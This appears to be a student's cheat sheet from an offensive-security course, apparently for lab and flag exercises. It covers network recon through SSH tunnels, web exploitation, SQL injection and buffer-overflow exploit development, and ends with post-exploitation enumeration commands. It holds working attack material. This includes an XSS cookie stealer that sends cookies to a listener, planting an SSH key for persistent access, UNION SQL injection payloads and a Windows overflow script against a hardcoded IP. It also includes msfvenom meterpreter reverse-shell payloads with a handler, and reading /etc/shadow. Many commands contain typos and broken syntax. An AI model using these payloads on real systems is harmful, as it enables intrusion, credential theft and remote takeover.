echo '' | grep -E '([" ])[a-zA-Z0-9]{20}\1'

                                  RECON
================================================================================
  1)  SSH to jump box
    a.  ssh -MS /tmp/jmp student@<jumpip>
  2)  Build socket
    a.  ssh -S /tmp/jmp jmp -O Forward -D 9050
    b.  [calles socket and makes it dynamic]
  3)  Enumerate target network
    a.  for i in {1..254}; do (ping -c 1 x.x.x.$i | grep "bytes from"&); done
  4)  Host enumeration
    a.  proxychains nmap -T5 <hostip>
      i.  nmap -T5 --script=http-enum x.x.x.x
  5)  Build on socket and include newly discovered hosts
    a.  ssh -S /tmp/jmp jmp -O forward
      -L 21001:x.x.x.x:21 -L 21002:x.x.x.x:22 -L 21003:x.x.x.x:80
  6)  tear down proxychains
    a.  ssh -S /tmp/jmp jmp -O cancel -D 9050
  7)  create a new Master socket into T1
    ssh -MS /tmp/T1 student@localhost -p 21002
  8)  Repeat from step 3
                                  Web Exp day 1
================================================================================
  HTTP CODES
    10X  Informational
    2XX  Success
    30X  Redirection
    4XX  Client Error
    5XX  Server Error
  HTTP Feilds
    User-Agent, referrer, cookie, date, server, set-cookie
  1)  XXS commands
    a.  Command injection
      ;  <bash>
        ex: ; ls -lisa
  2)  Cookie stealer - message boxes
    a.  <script> document.location="http://<ip>:<listeningport>/?username=" + document.cookie;</script>
    b.  Create a listener on linops
  3)  Make script 
    a.  vim image.pnp.php
      [script]
  4)  ssh keygen(LINOPS)
    a.  ssh-keygen -t rsa -b 4096
      >>enter, enter, and enter
    b.  cat /.ssh/id_rsa.pub
      (ON TARGET MACHINE)
    c.  mkdir /var/www/.ssh
      chmod 700 /var/www/.ssh
    d.  touch /var/www/.ssh/authorized_keys
      i.  creating file to add ssh-keygen to bypass authentications allowing ssh login ("key" copy straight from terminal)
      ii.  echo("key") >> /var/www/.ssh/authroized_keysm
  ssh www-data@localhost -p <port from step 5 local forward tunnel of methodolgy>
    (Web server is temporary means to gain access via ssh)
                                   Web Exp day 2 (sql injection)
================================================================================ 
  Get method
  1)  ID vuln  field
      url.com/phpfile.php\<select>=1 OR 1=1
  2)  ID amount of columns
    UNION select 1,2,3 #
  3)  create golden statement
    ;UNION select @@version,2,table_schema,
    table_name,column_name FROM
    information_schema.columns; #
      pulls entire database
      pulls flags from session column
      2 is a hidden coluumn, 1 is used as a filler item to bring
      column number up to 5 since that is the number of columns needed.
  4)  mod statement for starget
    <item> UNION SELECT 1,2,name,pass,id FROM
    session.user;#
  3 columns
  Post method
  1)  id vuln field
    inputbox: <item> ' OR 1='1
  2)  Id the number of columns:
    input box:  <item> 'UNION select 1.2.3#
      increase number until you do not recieve an error
  3)  create golden statement:
    input box:  audi 'UNION select @@version,2,table_schema, table_name. column_name FROM
    information_schema.columns; #
      pull entire database
      pull flags from session column
      2 is a hidden column, 1 is used as a filer item to bring column number up to 5 since that is the number of columns needed.
  4) modify statement for target:
    input box:  <item> 'UNION SELECT 1,2,name,pass,id
                FROM session.user;#
                                     EXPLOITION DEVELOPMENT
================================================================================ 
  1)  static analysis
    a. strings <filename>
  2)  Behavioral
    a.  run it
  3)  Dynamic
    1)  ID if parameter or userinput
      Parameter
        ./<program>$(echo 'insert command')
        Userinput
        ./<program><<<<$(echo 'insert command')
    2)  make python script
    3)  break in with 'A'
    4) GDB
      GDB ./<program name>
        shell gives back terminal
        exit goes back to gdb
          if files doesint load type file <filename>
     5)  info functions to view function calls - find bad function call
        info proc map
        get, strcpy, strcat, sprintf
      6)  Run <<<$(python <script name>)
      7)  Look up EIP
      8)  Pull up WireMask
        Generate pseudo-random string
        take eip register put into wiremask
        take offset # and add it to script a offset
      9)  find JMPESP
        env -gdb ./<.exe name>
        unset env lines
        unset env columns
      10)  run <.exe>
        first address bellow heap line
        last address on stack line
      11)  find /b <First head>, <Last Stack>, 0xff, 0xe4
        convert to little endian
      12)  replace "B" values in EIP variable with JMPESP
      13)  Add NOP sled (\x90)
      14)  Generate Shellcode
        run of gdb
        msfvenom -p linux/x86/exec CMD=<command you want to run> -b
        "\x00\xfe\x20\x0a\xff" -f python
                        WINDOWS EXPLOITATION
================================================================================
1)  Static
  springs <filname>
2)  Behavioral Analysis
  a)  netstat -anop tcp
  b)  nc <ip> <port>
  c)  rinse Immunity
    i.  Restart program
    ii.  check windows security settings
    iii.  play the program
  d.  immunity debugger
    i.  make sure program is running in bottom right
    ii.  script for win buffoverflow

    #!/usr/bin/python
    import socket 

    buf="TRUN/.:/"
    #buf += "A"*5000
    buf += "sudo random string"
    buf += "BBBB"
    buf += '\xAF\x11\x50\x62'
    buf +="
    s=socket.socket(socket.AF_INET,
    socket.SOCK_STREAM)
    s.connect(("10.50.136.46",9999))
    print s.recv(1024)
    s.send(buf)
    print s.recv(1024)

    s.close()

    JMPESP locations
      !mona modules - find the one with all falses
      !mona jmp -r esp -m "essfunc.dll" --change
      window to (Winows - log data)
    copy first address of jmp esp

    msfvenom -p windows/meterpreeter/reverse_tcp
    lhost=<linops> lport=4000 -b
    "\x00\xfe\x20\x0x\0xff" -f python - get shellcode add to script minix first line

    open msfvenom
    use muli/handler
    LPORT = 4444
    set payload windows/meterpreter/reverse_tcp
    exploit 
                        LIVING OFF THE LAND
================================================================================



                        POST X
================================================================================
METHOD:
  1)  USR - check for account that have shells, home folders, special permissions
  2)  PROC  -  check services that may be connceted to folders that have flags or potial ssh tunnels
  3)  SERV  -  look for poteial execuatbles where you could launch a buffer overflow attack or dll hijacking
  4)  NET  -  look potial targets and ports transmiting information
  5)  ADD  -  look for more information related to target or victim

keywords   -  secret,  flag,  hint,  password,  pass,  victim,  bad,  evil,  exploit, network,  map,  server,  message,  note,  key,  script.


WIN USR
net user                           - Displays a list of local users by username
net user <username>                - Displays properties associated with that username
net localgroup                     - Displays a list of local groups on the system
net localgroup <groupName>         - Provides a description of what the local group can do with a list of members in that group
wmic useraccount get name,sid      - This command displays the Security IDs (SIDs) of all user accounts on the system. If you know the username, use this command: wmic useraccount where name="USER" get sid

LIN USER
cat /etc/passwd **OR** getent passwd - List of all users/accounts on the local system by name, user-id, comment, home directory, and shell.
cat /etc/shadow                    - List of all users/accounts on the system along with their hashed passwd, password age, and  expiration information.
last                                 - History of previous account login/logout by username, terminal (local, remote), system/IP, date/time of login/logout, and duration.
who                                  - Who is currently logged into the system by name, terminal (local/remote), date/time they logged in, and IP address if remote.
w                                  - Who is currently logged into the system by username, terminal, and what they are doing.
whoami                             - Displays the user name of the user running the command
groups                             - Displays the list of groups to which the user running the command is a member
id                                 - Displays the username, userid, group name(s), and groupid(s) of the user running the command

WIN PROC
tasklist /v                                                                                                          - Displays "verbose" list of all running applications and services with their Process ID (PID).
wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname /format:list          - This will return a list of all installed AV products from the local machine:
wmic process where (processid=#) get parentprocessid,commandline                                                   - Display processes parent PID and command line

LIN PROC
ps -elf                              - View every process on the system in long format using standard UNIX syntax.
ps auxf                              - View every process on the system in forest view using BSD syntax.
pstree                             - Display a tree of processes. Forest view with the "ps" command tries to mimic this output to a certain degree.
lsof                                 - List open files. Everything in UNIX/Linux is a file (to a certain degree). The lsof enumerates open files and can provide information on pretty much all the activity on a system to include networking.  Some of the common arguments with this command are files associated with a process-ID  "-p PID", and internet "-i".

WIN SERV
tasklist /svc                                              - Displays services hosted in each process.
net start                                                  - Displays a list of services that have been started by their display name
wmic service list status                                     - Displays name and status of services.
Get-Service \ | Where {$_.Status -eq "Running"}              - PowerShell method of determining running services. Displays Name and DisplayName.

LIN SERV
chkconfig                                                  - SystemV method of listing all installed services
systemctl list-units --type service                        - Systemd method of listing all installed services
service --status-all                                       - SystemV method of listing running services.
systemctl list-units --type=service | grep running        - Systemd method of listing running services

WIN NET
ipconfig /all               - Display local interface information to include IP address/mask, MAC address, default router/gateway, and DNS settings.
netstat /anob               - Displays local listening ports, process-id and binary.
wmic netuse list full       - Displays: AccessMask, Comment, ConnectionState, ConnectionType, Description, DisplayType, InstallDate, LocalName, Name, Persistent, ProviderName, RemoteName, RemotePath, ResourceType, Status, UserName
net use                     - NET USE connects a computer to a shared resource or disconnects a computer from a shared resource. When used without options, it lists the computer's connections.
net view                    - Displays a list of resources being shared on the system. When used without options, it displays a list of computers in the current domain or network.
arp -a                      - Displays the arp cache on the system.
route print                 - Displays the system's routing table.

LIN NET
ip address **OR** ifconfig -a                 - Displays all interfaces on the system and their current configuration and status.
ss **OR** netstat                             - Displays network connections/sockets.

Options:
-a - displays all listening and non-listening ports
-l - displays only listening ports
-n - displays numeric IP addresses and ports
-p - displays process-id and program name (for root only)
-u - displays UDP sockets
-t - displays TCP sockets

arp -an                                     - Displays the arp cache on the system with numeric IPs instead of hostname.
ip route **OR** route **OR** netstat -r         - Displays the system's routing table.

WIN ADD
systeminfo              - lists info about the system you are on such as OS, OS version, product ID, processor(s), BIOS version, input locale, time zone, domain, hotfix(s), network card(s)
date /t && time /t      - displays the current system date and time

LIN ADD
cat /proc/cpuinfo       - displays information about the CPU such as model name, vendor id, CPU MHz
cat /etc/*rel*         - displays OS information like the name, version, home URL, and support URL
cat /etc/hosts          - displays any locally configured hostnames
lsmod

